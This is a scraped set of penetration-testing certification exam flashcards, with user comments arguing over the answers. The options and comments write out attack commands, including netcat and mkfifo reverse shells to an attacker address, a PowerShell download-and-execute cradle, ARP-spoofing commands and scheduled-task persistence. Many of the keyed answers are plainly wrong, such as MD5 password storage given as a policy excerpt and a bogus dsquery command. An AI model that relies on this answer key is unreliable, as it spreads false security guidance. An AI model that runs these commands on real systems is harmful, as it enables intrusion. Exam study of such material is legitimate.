Actual Exam Questions Flashcards
A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?
A. The latest vulnerability scan results
B. A list of sample application requests
C. An up-to-date list of possible exploits
D. A list of sample test accounts
B. A list of sample application requests
100%
A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Choose two.)
A. Tcpdump
B. Nmap
C. Wireshark
D. SSH
E. Netcat
F. Cain and Abel
D. SSH
E. Netcat
100%
mr_robot
4 months ago
C and D - PenTest+ Practice Tests Book - SYBEX In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.
upvoted 3 times
A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?
A. Infrastructure is being replaced with similar hardware and software.
B. Systems administrators are applying the wrong patches.
C. The organization is not taking action to remediate identified findings.
D. The penetration testing tools were misconfigured.
C. The organization is not taking action to remediate identified findings.
100%
A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?
A. Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.
B. Connect to the SQL server using this information and change the password to one or two non-critical accounts to demonstrate a proof-of-concept to management.
C. Notify the development team of the discovery and suggest that input validation be implemented with a professional penetration testing company.
D. Request that management create an RFP to begin a formal engagement with a professional penetration testing company.
A. Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.
A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
A. Enable HTTP Strict Transport Security.
B. Enable a secure cookie flag.
C. Encrypt the communication channel.
D. Sanitize invalid user input.
A. Enable HTTP Strict Transport Security
100%
D1960
5 months, 3 weeks ago
D. Sanitize invalid user input? Even if you enable HTTP Strict Transport Security, the application is still using basic authentication. The problem is with the application, not the communication channel. Basic authentication may not stop an SQL injection.
upvoted 1 times
D1960
4 months, 2 weeks ago
I was wrong, the correct answer is A. https://en.wikipedia.org/wiki/Basic_access_authentication
upvoted 1 times
jon34thna
5 months, 2 weeks ago
SYBEX | Pentest Questions | Chapter 5 Reporting and Communication | Question 125 A. Enable HTTP Strict Transport Security
upvoted 1 times
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book A. - In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). The HSTS response header lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).
A. Mandate all employees take security awareness training.
B. Implement two-factor authentication for remote access.
C. Install an intrusion prevention system.
D. Increase password complexity requirements.
E. Install a security information event monitoring solution.
F. Prevent members of the IT department from interactively logging in as administrators.
G. Upgrade the cipher suite used for the VPN solution.
A. Mandate all employees take security awareness training.
B. Implement two-factor authentication for remote access.
D. Increase password complexity requirements.
100%
A, C, G
A, D, G
Droid2000
11 months, 2 weeks ago
i think A should be included in ans
upvoted 4 times
AnAverageUser3656
9 months, 1 week ago
I agree with droid2000, “A” should be included and omit “G”. Improving employee education is a good way to mitigate phishing attacks.
upvoted 4 times
cooljane
8 months, 2 weeks ago
I believe correct answer are: A, D, G.
upvoted 2 times
phatboy
8 months, 1 week ago
It isn’t G, the ciphers are irrelevant, access was gained with phished credentials. The answer should definitely include B as this would have prevented access. I think the answer is either BDA or BDF.
upvoted 3 times
amankry
7 months, 3 weeks ago
A B D is the correct answer
upvoted 5 times
sharifengg
7 months, 3 weeks ago
A B D is the correct answer
upvoted 5 times
jon34thna
5 months, 2 weeks ago
SYBEX | PenTest+™ Practice Test | Chapter 5 | Reporting and Communication | Question 124 password complexity requirements. two-factor authentication for remote access. all employees take security awareness training. A | B | D
upvoted 3 times
mr_robot
3 months, 3 weeks ago
Actually the Sybex book states A | D | G. “In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that uses Transport Layer Security (TLS) or Secure Socket Layer (SSL). The set of algorithms that cipher suites usually contain includes a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.”
upvoted 1 times
mr_robot
1 month, 4 weeks ago
…but, I would go for A B D.
upvoted 1 times
ebot
1 month, 4 weeks ago
I would say ADG. Phishing requires employee awareness training, weak passwords would require increased complexity and the cipher suite needs to be upgraded. Should not be able to “easily” crack them. Possibly weak SSL or TLS. Source: Sybex page 163 & 166 “Insecure Cipher Use”
upvoted 1 times
mr_robot
1 month, 2 weeks ago
ADG seems to be the best even though MFA always goes together with strong passwords but, once you use a complex password together with AES 256-bit encryption for instance, it would be almost impossible to crack it. https://securitygladiators.com/vpn-encryption-guide/#Ciphers https://securityboulevard.com/2020/05/aes-encryption-a-closer-look-at-advanced-encryption-standards/
upvoted 1 times
kabwitte
1 month ago
I don’t think that upgrading the cipher suite would change anything because the attacker was successful using social engineering (Phishing). The level of security really doesn’t mean much if the attacker is able to con their way through with a little bit of charm. As a result, I would go with ABD like Boblee.
upvoted 1 times
boblee
1 month, 3 weeks ago
The answer is A B D.
upvoted 1 times
Leonar
3 weeks, 1 day ago
People, Process, Technology. A - People B - Technology D - Process
During testing, a critical vulnerability is discovered on a client’s core server. Which of the following should be the NEXT action?
A. Disable the network port of the affected service.
B. Complete all findings, and then submit them to the client.
C. Promptly alert the client with details of the finding.
D. Take the target offline so it cannot be exploited by an attacker.
C. Promptly alert the client with details of the finding
100%
phatboy
10 months, 3 weeks ago
I believe the answer should be C
upvoted 3 times
amankry
7 months, 3 weeks ago
C is correct answer
upvoted 3 times
D1960
5 months, 3 weeks ago
If it’s a critical vulnerability, shouldn’t you disable the port right away? Maybe A is the correct answer?
upvoted 1 times
jon34thna
5 months, 2 weeks ago
‘C’ A critical vulnerability is a reason to stop the pentest and call the client. Not A because you are not the Network Administrator.
upvoted 4 times
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book - SYBEX C. - In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.
upvoted 2 times
maps7
3 months, 3 weeks ago
I will go with C because as a pentester your job is to report your findings and let the administrator make decisions. Companies have the risk that they have accepted, so it will be wise to promptly alert the administrator of your findings and then only they can make a decision.
upvoted 3 times
Leonar
3 weeks, 1 day ago
Why don’t we cut off the powerline? :) The best answer is C
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
A. Selection of the appropriate set of security testing tools
100%
mr_robot
4 months, 1 week ago
Probably A?
upvoted 1 times
mr_robot
3 months, 3 weeks ago
https://resources.infosecinstitute.com/pentesting-ics-systems/#gref
upvoted 1 times
D1960
3 months ago
With the possible exception of PLCSCAN, none of those tools are unique to ICS. However, health and safety issues at a power plant would be unique.
upvoted 1 times
D1960
3 months, 1 week ago
Maybe C? Tools are always an issue. But a power plant has health and safety issues beyond that of a typical office.
upvoted 3 times
mr_robot
2 months, 1 week ago
I would agree with you. A selection of the appropriate set of security testing tools is already part of any pentesting assessment according to the type of company and test you need to do but, when asked “Which of the following is a consideration unique to such an environment”, it means that the pentest also has to consider and assess potential operational and safety hazards present onsite. http://www.fedco.co.id/vulnerability-assessment-and-penetration-testing-in-online-scada-ics-environment-webinar/
upvoted 2 times
boblee
1 month, 3 weeks ago
The answer is A. Because you would have to do more research to find tools that can test that specific SCADA system.
upvoted 3 times
kabwitte
1 month ago
I’m going for A. Reason? A single TCP or UDP port scan against a SCADA component can cause catastrophic damage of mass proportion. Before testing SCADA systems, pentesters should know the proper tools to use to ensure the testing provides adequate coverage and reduces the likelihood of knocking over critical services. Nutting, Raymond. CompTIA PenTest+ Certification All-in-One Exam Guide (Exam PT0-001) (p. 83). McGraw-Hill Education. Kindle Edition.
upvoted 2 times
Leonar
3 weeks, 1 day ago
It is always human life in the first place. C !
A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester’s source IP addresses to the client’s IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester’s source IP addresses should be whitelisted?
A. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems.
B. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test.
C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses.
D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.
D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.
100%
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book - SYBEX D. - Whitelisting testers in intrusion prevention systems (IPSs), web application firewalls (WAFs), and other security devices will allow them to perform their tests without being blocked. For a white box test, this means that testers won’t spend time waiting to be unblocked when security measures detect their efforts. Black box and red team tests are more likely to result in testers being blacklisted or blocked by security measures. In this scenario, the penetration tester should tell the client that testing should focus on the discovery of potential security issues through all in-scope systems and not just on determining the effectiveness of active defenses such as the IPS.
upvoted 2 times
Leonar
3 weeks, 1 day ago
D is okay, but the best rationale is to let them know that threat actors are not only outsiders but also insiders who could be whitelisted.
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).
A. Randomize local administrator credentials for each machine.
B. Disable remote logons for local administrators.
C. Require multifactor authentication for all logins.
D. Increase minimum password complexity requirements.
E. Apply additional network access control.
F. Enable full-disk encryption on every workstation.
G. Segment each host into its own VLAN.
C. Require multifactor authentication for all logins.
D. Increase minimum password complexity requirements.
E. Apply additional network access control.
100%
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book - SYBEX C, D and F - In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be the following:
- Use multifactor authentication. Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism.
- Increase minimum password complexity. Complex passwords use different types of characters in unique ways to increase security, making it harder for an attacker to crack.
- Enable full-disk encryption. Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.
upvoted 3 times
maps7
3 months, 2 weeks ago
But F, how does disk encryption stop an attacker from lateral movement?
upvoted 1 times
mr_robot
1 month, 3 weeks ago
You are right. I guess E would be a better option even though you can easily bypass NAC by spoofing your MAC address with a deskphone for instance - https://resources.infosecinstitute.com/nac-hacking-bypassing-network-access-control/ But A seems to be a valid option too as “Microsoft’s Local Administrator Password Solution (LAPS) can have drastic impact in the fight against lateral movement techniques. It is an effective way to prevent some potential lateral movement or privilege escalation within your environment.” https://blog.stealthbits.com/running-laps-in-the-race-to-security/ https://blog.stealthbits.com/3-zero-cost-tactics-make-difficult-attackers-move-laterally/ But it can also be bypassed just like any security defense: https://www.youtube.com/watch?v=vaov8F-0dQ8 Anyway I will stick with CDE.
upvoted 1 times
D1960
3 months, 2 weeks ago
Tough one. C & D for sure. But I am not sure if E or F is better. I think I will go with CDE. Encrypting a disk does not seem to address the problem that is presented - being able to easily move from one host to another.
upvoted 1 times
boblee
1 month, 3 weeks ago
The answer is CDE.
upvoted 1 times
kabwitte
1 month ago
I would go with C, D, G. I believe that the reason the attacker was able to move laterally without any obstacles is because all the hosts were on the same network. It takes more work to move laterally if these compromised hosts were on different networks. To accomplish such a task, a virtual LAN (VLAN) needs to be implemented. This would make each host look like they are on their own separate network. Thus, when the attacker compromises the initial host, the others won’t be readily available or seen.
upvoted 1 times
kabwitte
1 month ago
I think I have a change of heart on this one. I would go for CDE. Implementing a VLAN for each host in that ONE domain is a bit extreme for a recommendation. The easier approach would be additional network access controls which would apply to all hosts within that domain.
upvoted 1 times
Leonar
3 weeks, 1 day ago
G must be involved in as the top solution
Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?
A. To remove the persistence
B. To enable persistence
C. To report persistence
D. To check for persistence
A. To remove the persistence
100%
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book - SYBEX A. chkconfig is a tool for managing which run levels a service will run at. chkconfig can be used to view or change the run level of a service. Using chkconfig --del will set the named service to not run at the current run level and will remove the persistence.
upvoted 5 times
noura_141
3 weeks, 2 days ago
Your comments are very helpful thank you
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s home folder titled “changepass.”
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using “strings” to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?
A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.
B. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path ‘/home/user/’. Then run changepass.
C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.
D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.
D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.
100%
phatboy
8 months, 1 week ago
How can the attacker run a command with sudo if they only have low-privilege access?
upvoted 1 times
Marshmallow
7 months, 1 week ago
The SUID is set for the write permission and that’s how the user can do SUDO.
upvoted 1 times
Evens_chokoe
5 months, 3 weeks ago
The attacker is running sudo just as a privilege escalation technique.
upvoted 1 times
mr_robot
3 months, 3 weeks ago
I would go for D. - https://www.pentestpartners.com/security-blog/exploiting-suid-executables/
upvoted 1 times
mr_robot
1 month, 2 weeks ago
The tester needs to create another dodgy copy of the changepw script and move it to another directory (ex: \tmp), not the initial changepass executable. Export ENV_PATH to the chosen directory of the dodgy script (ex: \temp) and then run the changepass executable. “ChangePW is a freeware command line tool to set a password, display the current userAccountControl password flags, and enable or disable an account.” https://www.itprotoday.com/compute-engines/jsi-tip-9267-changepw-freeware-command-line-tool-set-password-display-current
upvoted 1 times
NoImDirtyDan
3 weeks, 2 days ago
C is what you are describing.
A malicious user wants to perform a MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?
A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20
B. arpspoof -t 192.168.1.20 192.168.1.254
C. arpspoof -c both -t 192.168.1.20 192.168.1.253
D. arpspoof -r -t 192.168.1.253 192.168.1.20
B. arpspoof -t 192.168.1.20 192.168.1.254
100%
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book - SYBEX B. - A man-in-the-middle attack intercepts a communication between two systems. ARP stands for Address Resolution Protocol, and it allows the network to translate IP addresses into MAC addresses. In this scenario, the attacker wants to perform a man-in-the-middle attack; it is done by performing arpspoof -t. The -t switch specifies a particular host to ARP poison.
upvoted 3 times
NoImDirtyDan
3 weeks, 4 days ago
Correct answer is D. You must use -r to capture traffic in both directions, creating a true MITM.
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. nc 192.168.1.5 44444
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
D. nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
D. nc -e /bin/sh 192.168.1.5 44444
100%
zgwy
11 months, 2 weeks ago
Wrong…C and D http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
upvoted 2 times
D1960
5 months, 3 weeks ago
I also think the correct answers are C and D. According to this site: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ This should work: # nc 192.168.1.5 44444 -e /bin/sh Note that D is very similar: nc -e /bin/sh 192.168.1.5 44444
- A is probably wrong because no shell is executed
- B is probably wrong because no IP is specified
- E is wrong because there is no port 444444 (too high a port)
- F is wrong because the IP is 192.168.5.1, not 192.168.1.5
upvoted 2 times
deathfrom
3 months, 3 weeks ago
I think there are 3 correct answers here: B, C & D. B is needed to create a nc listener on the attacker's machine. C will work when the -e option is not available for nc. D works because the -e option is available. More than likely it will be C/D.
upvoted 1 times
mr_robot
1 month, 2 weeks ago
The question asks for two possible ways to gain a reverse shell back to the attacking machine at 192.168.1.5. So the correct answers would be C and D. You can use either one to gain a reverse shell. B (nc -nlvp 44444 -e /bin/sh) is just a listener on the remote machine used for a bind shell.
Bind Shell - have the listener running on the target and the attacker connect to the listener in order to gain a remote shell.
nc -nvlp 5555 -e /bin/bash - setting up a listener on the remote machine
nc -nv 192.168.10.10 5555 - use our machine to connect to it remotely
Reverse Shell - have the listener running on the attacker and the target connecting to the attacker with a shell.
nc -nvlp 5555 - setting up a listener on the attacker machine
nc -nv 192.168.20.20 5555 -e /bin/bash - use the target machine to connect to our machine
http://stuffjasondoes.com/2018/07/18/bind-shells-and-reverse-shells-with-netcat/ The thing is, everywhere I see this question B and C are correct, so what do we need to do to pass the exam: trust our own instincts/experience or what CompTIA believes is correct? Is it worth paying for the CompTIA CertMaster Practice in order to verify all those doubtful questions?
upvoted 1 times
boblee
1 month, 2 weeks ago
CertMaster does not have these questions. I have certmaster.
upvoted 1 times
NoImDirtyDan
4 weeks ago
The correct answers are C & D. Source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?
A. schtasks.exe /create/tr “powershell.exe” Sv.ps1 /run
B. net session server | dsquery -user | net use c$
C. powershell && set-executionpolicy unrestricted
D. reg save HKLM\System\CurrentControlSet\Services\Sv.reg
A. schtasks.exe /create/tr “powershell.exe” Sv.ps1 /run
100%
phatboy
8 months ago
Correct answer is A. https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/
upvoted 3 times
mr_robot
4 months, 3 weeks ago
According to PenTest+ Practice Tests Book - SYBEX D. - reg save saves a copy of specified subkeys, entries, and values of the registry in a specified file. A file with the .reg file extension is a registration file used by the Windows Registry. These files can contain hives, keys, and values.
upvoted 1 times
D1960
3 months, 2 weeks ago
What good is saving the registry entries, if you cannot restore them? If you lose your access to the system, how do you restore your access by restoring part of the registry?
upvoted 1 times
mr_robot
3 months ago
I agree with you; however, the schtasks command is incomplete. For the attacker to maintain persistence during logon he would need to add the /sc onlogon switch to the command: https://rasor.wordpress.com/2013/08/12/powershell-scheduling-a-task/ For that reason, I think D would not be the best answer but the least incorrect: https://rasor.wordpress.com/2013/08/12/powershell-scheduling-a-task/ “HKLM\System\CurrentControlSet\services The keys located here get loaded by the Service Controller at various times during the operation of the computer. Some are loaded at system startup and others are loaded on demand or when triggered by other events. The attackers want to load at startup so that even if no user logs in they can connect to the computer.”
upvoted 1 times
mr_robot
1 month, 3 weeks ago
Also, once you modify the registry you can add a dodgy service to be started at logon and maintain persistence to the device: https://threatvector.cylance.com/en_us/home/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services.html https://threatvector.cylance.com/en_us/home/windows-registry-persistence-part-2-the-run-keys-and-search-order.html
upvoted 1 times
mr_robot
1 month, 1 week ago
Best answer is A. You have to use “reg add” instead of “reg save” in order to add a new subkey or entry to the registry.
upvoted 2 times
khuno
4 weeks, 1 day ago
Examples:
reg add \ABC\HKLM\Software\MyCo
reg save HKLM\Software\MyCo\MyApp AppBkUp.hiv
upvoted 1 times
merdoso
3 months, 2 weeks ago
Strange, agree about A. The issue is that you could get persistence with both… but a reg key like this is strange.
upvoted 1 times
DaDude
3 months, 2 weeks ago
The schtasks command is not complete. /run is on-demand (you would need to be on the machine to run this); if you lost connection you would not be able to run it again.
upvoted 1 times
D1960
2 months ago
But maybe you would not have to run it again? It depends on what the powershell script does.
upvoted 1 times
boblee
1 month, 3 weeks ago
The answer is A in this context. SYBEX is bad.
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
A. set rhost 192.168.1.10
B. run autoroute -s 192.168.1.0/24
C. db_nmap -iL /tmp/privatehosts.txt
D. use auxiliary/server/socks4a
D. use auxiliary/server/socks4a
100%
D1960
4 months, 2 weeks ago
Maybe: B. run autoroute -s 192.168.1.0/24 ? Reference: https://www.offensive-security.com/metasploit-unleashed/Pivoting/
upvoted 1 times
mr_robot
2 months, 3 weeks ago
Agree with you. “Preparing to pivot across a network requires us to first establish a Meterpreter session on the victim machine. From there, we can use the autoroute script to enable access to the non-routable subnet” - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/server/socks4a.md
run autoroute -s 192.168.1.0/24 - Add a route to 192.168.1.0/24 (establish a Meterpreter session on the victim machine) - https://www.offensive-security.com/metasploit-unleashed/Pivoting/
use auxiliary/server/socks4a - Set up and run a socks proxy over meterpreter; this module provides a socks4a proxy server that uses the builtin Metasploit routing to relay connections. - https://www.offensive-security.com/metasploit-unleashed/proxytunnels/ https://nullsweep.com/pivot-cheatsheet-for-pentesters/
set rhost 192.168.1.10 - Set the target address
db_nmap -iL /tmp/privatehosts.txt - Use nmap and place results in the database
upvoted 1 times
kabwitte
4 weeks, 1 day ago
Yup, I believe you are correct sir! The link you provided actually gives the answer. :)
upvoted 1 times
mr_robot
4 months, 2 weeks ago
PenTest+ Practice Tests Book - SYBEX D. Metasploit is a tool for the development of exploits and the testing of them on live targets. The socks4a auxiliary is a module from within the framework. This auxiliary module provides a proxy server that uses Metasploit Framework routing to relay connections. So, using the use auxiliary/server/socks4a module allows a tester to access a private network from the Internet.
upvoted 4 times
mr_robot
2 months, 3 weeks ago
Don’t think this is right. Probably A is correct. - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/server/socks4a.md
upvoted 1 times
khuno
1 month, 3 weeks ago
It will be socks4a that will create a session through the internet. (the question says access the network.) It will not be autoroute because that will help you pivot to another computer in the network. Meaning you are already in.
upvoted 2 times
kabwitte
4 weeks, 1 day ago
I would go with B: Preparing to pivot across a network requires us to first establish a Meterpreter session on the victim machine. From there, we can use the autoroute script to enable access to the non-routable subnet: meterpreter > run autoroute -s 10.0.0.0/24 Note: A non-routable address is a private network address. Non-routable: https://docs.actian.com/dataconnect/11.1/index.html#page/User/Non-routable_Addresses.htm
upvoted 1 times
kabwitte
4 weeks, 1 day ago
Sorry, I missed a source for the autoroute script: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/server/socks4a.md
A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?
A. Randomize the credentials used to log in.
B. Install host-based intrusion detection.
C. Implement input normalization.
D. Perform system hardening.
D. Perform system hardening.
D1960
5 months, 3 weeks ago
This is an attack on an application, not a host. There might be some sort of host hardening that would help, maybe a WAF? But I cannot help but wonder if C is a better answer? I think input normalization would sanitize the input, which would prevent an SQL injection.
upvoted 2 times
jon34thna
5 months, 2 weeks ago
Yep, difficult call here. But I think D is correct. If ‘C’ used the word Sanitization or Parameterized query I may be tempted, but ‘Normalization’…? I would stick with D.
upvoted 1 times
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book D. - System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the computer. The goal of systems hardening by removing unused programs, accounts, functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following: application hardening, operating system hardening, server hardening, database hardening, and network hardening.
upvoted 2 times
mr_robot
2 months ago
It seems Input Validation and Sanitisation are the first line of defense against SQL injections, even though Parameterised queries are better but in this scenario I think “the BEST recommendation” would be to do system hardening. “The risks associated with code injections are escalated when the databases or operating system tied to the Web applications under attack are weak due to poor patching and configuration. In addition, the system administrator should be responsible for hardening the underlying database and the operating system by disabling unnecessary services and functionality.” https://wikisites.cityu.edu.hk/sites/netcomp/articles/Pages/Hardening%20Steps%20to%20Mitigate%20Code%20Injection.aspx https://resources.infosecinstitute.com/sql-injection-protection-cloud-systems/
upvoted 1 times
boblee
1 month, 3 weeks ago
The answer is C.
upvoted 2 times
khuno
4 weeks, 1 day ago
https://www.essentialsql.com/get-ready-to-learn-sql-database-normalization-explained-in-simple-english/ Normalization is all about avoiding redundancy. “There are three main reasons to normalize a database. The first is to minimize duplicate data, the second is to minimize or avoid data modification issues, and the third is to simplify queries. “ I’ll go for D.
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
A. From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal
B. From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm
C. From the remote computer, run the following command: ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 “xhost+; xterm”
D. From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192.168.1.10 6000
A. From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal
100%
xxdxx
6 months, 1 week ago
When I tried these commands, only B worked successfully
upvoted 3 times
jon34thna
5 months, 2 weeks ago
I don’t think A. Several tests, and I think it is B or D.
upvoted 1 times
GOKU1984
4 months, 4 weeks ago
B is the only one that worked. D brought up an xterm window of the same terminal you were trying from.
upvoted 1 times
mr_robot
4 months, 1 week ago
Which Linux distro did you guys test the commands from B? I used the latest Kali but could not make it work. I got connection refused even though I had enabled SSH.
upvoted 1 times
D1960
3 months, 1 week ago
According to ssh man pages: -L [bind_address:]port:host:hostport : Specifies that connections to the given TCP port or Unix socket on the local (client) host are to be forwarded to the given host and port, or Unix socket, on the remote side. -X : Enables X11 forwarding
upvoted 1 times
mr_robot
1 month, 4 weeks ago
Another example for B: https://www.howtogeek.com/168145/how-to-use-ssh-tunneling/ https://explainshell.com/explain?cmd=ssh+-L4444%3A127.0.0.1%3A6000+-X+user%4010.0.0.20+xterm Commands from A seem incomplete: https://www.lifewire.com/linux-command-xhost-4093456
upvoted 1 times
khuno
1 month, 3 weeks ago
Isn’t the key here “graphic console window”? The other options are terminal only?
upvoted 1 times
khuno
4 weeks, 1 day ago
Never mind, got confused with GUI.
upvoted 1 times
khuno
4 weeks, 1 day ago
I will go with D, just because the local IP on B is wrong
Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?
A. Creating a scope of the critical production systems
B. Setting a schedule of testing access times
C. Establishing a white-box testing engagement
D. Having management sign off on intrusive testing
B. Setting a schedule of testing access times
100%
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A. dsrm -users “DN=company.com; OU=hq CN=users”
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
D. dsquery -o -rdn -limit 21
100%
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
C. HKEY_CURRENT_USER
100%
In which of the following scenarios would a tester perform a Kerberoasting attack?
A. The tester has compromised a Windows device and dumps the LSA secrets.
B. The tester needs to retrieve the SAM database and crack the password hashes.
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.
D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.
100%
Which of the following excerpts would come from a corporate policy?
A. Employee passwords must contain a minimum of eight characters, with one being alphanumeric.
B. The help desk can be reached at 800-passwd1 to perform password resets.
C. Employees must use strong passwords for accessing corporate assets.
D. The corporate systems must store passwords using the MD5 hashing algorithm.
D. The corporate systems must store passwords using the MD5 hashing algorithm.
100%
Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring("http://site/script.ps1");Invoke-Cmdlet
Which of the following BEST describes the actions performed by this command?
A. Set the execution policy.
B. Execute a remote script.
C. Run an encoded command.
D. Instantiate an object.
